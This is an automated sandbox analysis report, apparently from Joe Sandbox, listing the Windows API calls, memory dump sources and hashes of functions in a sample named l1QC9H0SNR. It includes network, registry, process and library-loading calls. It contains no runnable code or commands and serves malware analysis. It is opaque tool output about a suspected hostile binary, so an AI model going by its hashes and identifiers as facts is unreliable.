                                                • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00BA8F14
                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00BA8F27
                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00BA8F57
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$_memmove$ClassName
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 365058703-1403004172
                                              • Opcode ID: 1ab1cd22bd91de0764f5d8488685d0a3ab6059e96d26fc20fe5d444092c38c59
                                              • Instruction ID: af8f9b5f362586127d920dbf8581cebd56de332e8ec3281d8c46f5f3884b576c
                                              • Opcode Fuzzy Hash: 1ab1cd22bd91de0764f5d8488685d0a3ab6059e96d26fc20fe5d444092c38c59
                                              • Instruction Fuzzy Hash: E921F571A08105BEDB14ABB0DC95DFEB7F9DF06320F0485AAF825571E0DF3A4809D620
                                              APIs
                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BC184C
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BC1872
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BC18A2
                                              • InternetCloseHandle.WININET(00000000), ref: 00BC18E9
                                                • Part of subcall function 00BC2483: GetLastError.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC2498
                                                • Part of subcall function 00BC2483: SetEvent.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC24AD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                              • String ID:
                                              • API String ID: 3113390036-3916222277
                                              • Opcode ID: c5393edbfca1024514f6a4ec7ce4e8fbd9663c87d8c4d1e35fdfe474647f2a8e
                                              • Instruction ID: 241ad89fb8f05e0850a344ac31c1f99b09c7253521ad94824f7122e9ca64a3b1
                                              • Opcode Fuzzy Hash: c5393edbfca1024514f6a4ec7ce4e8fbd9663c87d8c4d1e35fdfe474647f2a8e
                                              • Instruction Fuzzy Hash: 3B21BEB1508209BFEB11AB68CC85FBB77EDEB49744F10456EF906A7241EB208D0597B0
                                              APIs
                                                • Part of subcall function 00B51D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B51D73
                                                • Part of subcall function 00B51D35: GetStockObject.GDI32(00000011), ref: 00B51D87
                                                • Part of subcall function 00B51D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B51D91
                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BD6461
                                              • LoadLibraryW.KERNEL32(?), ref: 00BD6468
                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BD647D
                                              • DestroyWindow.USER32(?), ref: 00BD6485
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                              • String ID: SysAnimate32
                                              • API String ID: 4146253029-1011021900
                                              • Opcode ID: 7bd4f44632b74005eacbb51e0bb6a7abfaa6108c53e439e3506be2fe1659e95a
                                              • Instruction ID: 29c40d73d9da27f96f33938ba8f1a609f85ef3d209e316afab08b738295d2dc4
                                              • Opcode Fuzzy Hash: 7bd4f44632b74005eacbb51e0bb6a7abfaa6108c53e439e3506be2fe1659e95a
                                              • Instruction Fuzzy Hash: 7F215B71200205AFEF108F64DC91EBBB7E9EB59368F10866AFA5093390EB71DC519B60
                                              APIs
                                              • GetStdHandle.KERNEL32(0000000C), ref: 00BB6DBC
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BB6DEF
                                              • GetStdHandle.KERNEL32(0000000C), ref: 00BB6E01
                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00BB6E3B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: f4274e01a57529327977d6d8a07e6cba1bf1a0f6b8be5c7141892a3bc861ebab
                                              • Instruction ID: f36396093677caeabfa429cf8a194711374b5b90543468cb8efc912f61174b1a
                                              • Opcode Fuzzy Hash: f4274e01a57529327977d6d8a07e6cba1bf1a0f6b8be5c7141892a3bc861ebab
                                              • Instruction Fuzzy Hash: 9821837460020AABDB209F29DC44AF9BBE4EF44720F204A69FCA1D72D0EBB4DD50CB50
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00BB6E89
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BB6EBB
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00BB6ECC
                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00BB6F06
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: 5fe2ecd8d4ce92411b8543b5851e921d9145028d129131959d7eef20dd4b8e8a
                                              • Instruction ID: a9f29f380e78b85402e79fa229611ef02716904f37e950940b41bbd360de12b4
                                              • Opcode Fuzzy Hash: 5fe2ecd8d4ce92411b8543b5851e921d9145028d129131959d7eef20dd4b8e8a
                                              • Instruction Fuzzy Hash: DB2192755003069BDB209F69DC44AFAB7E8EF45720F200A59F9A1D72D0EBB4EC50CB50
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00BBAC54
                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00BBACA8
                                              • __swprintf.LIBCMT ref: 00BBACC1
                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,00BDF910), ref: 00BBACFF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorMode$InformationVolume__swprintf
                                              • String ID: %lu
                                              • API String ID: 3164766367-685833217
                                              • Opcode ID: 0aa3912d246f53dd5615eb86e629f5a0191a06d5d743e51701ede60d2c0ae53d
                                              • Instruction ID: e077656c7554d7e48ecaa0b1fbcf18932779a22748b1594c79dd29201348ccba
                                              • Opcode Fuzzy Hash: 0aa3912d246f53dd5615eb86e629f5a0191a06d5d743e51701ede60d2c0ae53d
                                              • Instruction Fuzzy Hash: 22217170A00109EFCB10DF64CD85EEEBBF8EF49715B0040E9F909AB261DA71EA45CB21
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00BB1B19
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                              • API String ID: 3964851224-769500911
                                              • Opcode ID: 33fe4d1fbdcb6689bca0d9a0358116349a6025c8d4ec6b339509fad44f0a740a
                                              • Instruction ID: 62705b149c8d524d7f3e1972a5cb798f64ab68b785e72021af22a9cc65b57549
                                              • Opcode Fuzzy Hash: 33fe4d1fbdcb6689bca0d9a0358116349a6025c8d4ec6b339509fad44f0a740a
                                              • Instruction Fuzzy Hash: 7F113C709102099FCF10EF98D8629FEB7F4FF25704F5088E5D86567695EB32990ACB50
                                              APIs
                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BCEC07
                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BCEC37
                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00BCED6A
                                              • CloseHandle.KERNEL32(?), ref: 00BCEDEB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                              • String ID:
                                              • API String ID: 2364364464-0
                                              • Opcode ID: fc4e78a609f2ccaa543551182b7d9b94a8860e388a4554518a12aa440f5f4516
                                              • Instruction ID: 51b2b4f1a95f94c2c1215edcb9abc5d0269b6c3fb8ed0d567ab3b890472004a3
                                              • Opcode Fuzzy Hash: fc4e78a609f2ccaa543551182b7d9b94a8860e388a4554518a12aa440f5f4516
                                              • Instruction Fuzzy Hash: 29815F716047019FD720EF28C886F2AB7E5AF44750F1488ADF96ADB2D2DBB0ED448B51
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00BD0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD00FD
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BD013C
                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BD0183
                                              • RegCloseKey.ADVAPI32(?,?), ref: 00BD01AF
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BD01BC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                              • String ID:
                                              • API String ID: 3440857362-0
                                              • Opcode ID: c216ac56a39e07f9a126923b1f6a177c58247170ab9cdd6a0ac3b5b2a60585a7
                                              • Instruction ID: 266d85fa75bb4f09f2f382e473766fdd2c573288a45c68372f14d48820ef6cbe
                                              • Opcode Fuzzy Hash: c216ac56a39e07f9a126923b1f6a177c58247170ab9cdd6a0ac3b5b2a60585a7
                                              • Instruction Fuzzy Hash: 42518F71218204AFC714EF64CC91F6AB7E9FF84304F4449AEF955972A1EB31E909CB52
                                              APIs
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00BCD927
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00BCD9AA
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00BCD9C6
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00BCDA07
                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00BCDA21
                                                • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BB7896,?,?,00000000), ref: 00B55A2C
                                                • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BB7896,?,?,00000000,?,?), ref: 00B55A50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                              • String ID:
                                              • API String ID: 327935632-0
                                              • Opcode ID: 29ad0d0cade7176c8e594abd185ca7d51594a62c1ceabcd6ac06a9e29e336e24
                                              • Instruction ID: b35dcd2790b90e576e24c887e1d70285aeecce45ba40f21efc01c42e733da825
                                              • Opcode Fuzzy Hash: 29ad0d0cade7176c8e594abd185ca7d51594a62c1ceabcd6ac06a9e29e336e24
                                              • Instruction Fuzzy Hash: 20510979A04209DFCB10EFA8C494EADB7F5EF09311B1480A9E956AB312DB31ED45CB51
                                              APIs
                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00BBE61F
                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00BBE648
                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00BBE687
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00BBE6AC
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00BBE6B4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                              • String ID:
                                              • API String ID: 1389676194-0
                                              • Opcode ID: 1e8c29daf7834bcd4c1a13f6836a33e8c870c9de51db38f2345a77574bf96f7d
                                              • Instruction ID: 0dbc1dddae5b4f5edfe6d729659bc166eed39fee89411fd3c29819a9e56fae4a
                                              • Opcode Fuzzy Hash: 1e8c29daf7834bcd4c1a13f6836a33e8c870c9de51db38f2345a77574bf96f7d
                                              • Instruction Fuzzy Hash: CE510A35A00609DFCB01EF64C981AADBBF5EF09355B1480E9E819AB361DB31ED15DF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0238ca337e9c70d8ef8cdc54246b2d9dd9db627a003b39a151d3614606b20de5
                                              • Instruction ID: 837725c2ec30b1cecbb31c3bc513095c6eea42b0c8d3c7bd931b189cb6fb3923
                                              • Opcode Fuzzy Hash: 0238ca337e9c70d8ef8cdc54246b2d9dd9db627a003b39a151d3614606b20de5
                                              • Instruction Fuzzy Hash: D0419035905104AFD724DF28CC99FA9FBE4EB0A310F1542A6E916B73E1EB30AD41DA51
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA63E7
                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00BA6433
                                              • TranslateMessage.USER32(?), ref: 00BA645C
                                              • DispatchMessageW.USER32(?), ref: 00BA6466
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA6475
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                              • String ID:
                                              • API String ID: 2108273632-0
                                              • Opcode ID: e98b99383d11a2473011f624ddae0c05b3b8154dc8ff9dcf3b9a8541c89e93d4
                                              • Instruction ID: b3d3e32ba7d05e0493b568a9955c54ddb4ec59e9f23509ddaa17dbf6249b4fd2
                                              • Opcode Fuzzy Hash: e98b99383d11a2473011f624ddae0c05b3b8154dc8ff9dcf3b9a8541c89e93d4
                                              • Instruction Fuzzy Hash: 603194B1909646DFDB248F749C84BFABBE8EB07300F1841A5E425C72A1EB359859D750
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00BA8A30
                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00BA8ADA
                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00BA8AE2
                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00BA8AF0
                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00BA8AF8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessagePostSleep$RectWindow
                                              • String ID:
                                              • API String ID: 3382505437-0
